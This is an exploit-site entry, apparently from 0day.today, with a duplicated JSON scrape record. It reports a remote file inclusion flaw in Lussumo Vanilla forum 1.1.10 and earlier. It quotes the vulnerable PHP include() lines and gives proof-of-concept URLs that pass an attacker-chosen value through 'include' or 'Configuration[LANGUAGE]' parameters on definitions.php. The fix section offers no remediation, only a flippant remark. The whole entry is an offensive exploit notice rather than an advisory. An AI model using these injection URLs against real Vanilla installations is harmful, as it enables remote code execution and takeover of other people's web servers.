ID 1337DAY-ID-11775
Type zdt
Reporter eidelweiss
Modified 2010-04-13T00:00:00
Description
Exploit for php platform in category web applications
=====================================================
Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
=====================================================
########################################################
Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
########################################################
Title: Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
Version: 1.1.10
link: http://php.opensourcecms.com/scripts/redirect/website.php?id=128
License: -
CVE-ID: CVE-2010-1337
OSVDB-ID: 63654
Vulnerable: Lussumo Vanilla 1.1.10
Lussumo Vanilla 1.1.9
Lussumo Vanilla 1.1.8
Lussumo Vanilla 1.1.7
Lussumo Vanilla 1.1.5
Lussumo Vanilla 1.1.4
Lussumo Vanilla 1.1.3
Lussumo Vanilla 1.0.1
Lussumo Vanilla 1.1.5 RC1
Lussumo Vanilla 1.0
References: http://www.packetstormsecurity.com/1003-exploits/vanilla-rfi.txt
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1337
http://osvdb.org/show/osvdb/63654
http://www.securityfocus.com/bid/38889
http://xforce.iss.net/xforce/xfdb/57147
########################################################
Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)
########################################################
-=[ VULN ]=-
[-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php');
[-] include($Configuration['APPLICATION_PATH'].'conf/language.php');
-=[ P0C ]=-
[+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
[+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]
################################################################
[ FIX ] Use Your Skill and Play Your Imagination
################################################################
# 0day.today [2018-01-05] #
{"id": "1337DAY-ID-11775", "type": "zdt", "bulletinFamily": "exploit", "title": "Vanilla-1.1.10 <= Remote File Inclusion Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2010-04-13T00:00:00", "modified": "2010-04-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/11775", "reporter": "eidelweiss", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-06T01:05:53", "viewCount": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2010-1337"]}]}, "exploitation": null, "vulnersScore": 7.2}, "sourceHref": "https://0day.today/exploit/11775", "sourceData": "=====================================================\r\nVanilla-1.1.10 <= Remote File Inclusion Vulnerability\r\n=====================================================\r\n\r\n########################################################\r\n Vanilla-1.1.10 <= Remote File Inclusion Vulnerability\r\n########################################################\r\n \r\nTitle: Vanilla-1.1.10 <= Remote File Inclusion Vulnerability\r\nVersion: 1.1.10\r\nlink: http://php.opensourcecms.com/scripts/redirect/website.php?id=128\r\nLicense: -\r\nCVE-ID: CVE-2010-1337\r\nOSVDB-ID: 63654\r\nVulnerable: Lussumo Vanilla 1.1.10\r\n Lussumo Vanilla 1.1.9\r\n Lussumo Vanilla 1.1.8\r\n Lussumo Vanilla 1.1.7\r\n Lussumo Vanilla 1.1.5\r\n Lussumo Vanilla 1.1.4\r\n Lussumo Vanilla 1.1.3\r\n Lussumo Vanilla 1.0.1\r\n Lussumo Vanilla 1.1.5 RC1\r\n Lussumo Vanilla 1.0\r\nReferences: http://www.packetstormsecurity.com/1003-exploits/vanilla-rfi.txt\r\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1337\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1337\r\n http://osvdb.org/show/osvdb/63654\r\n http://www.securityfocus.com/bid/38889\r\n http://xforce.iss.net/xforce/xfdb/57147\r\n########################################################\r\n \r\nAuthor: eidelweiss\r\nContact: eidelweiss[at]cyberservices.com\r\nThanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris\r\n Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)\r\n AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)\r\n \r\n########################################################\r\n \r\n -=[ VULN ]=-\r\n \r\n[-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php');\r\n \r\n[-] include($Configuration['APPLICATION_PATH'].'conf/language.php');\r\n \r\n -=[ P0C ]=-\r\n \r\n[+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]\r\n[+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]\r\n \r\n################################################################\r\n[ FIX ] Use Your Skill and Play Your Imagination\r\n################################################################\r\n\r\n\n\n# 0day.today [2018-01-05] #", "_state": {"dependencies": 1645390919}}
{}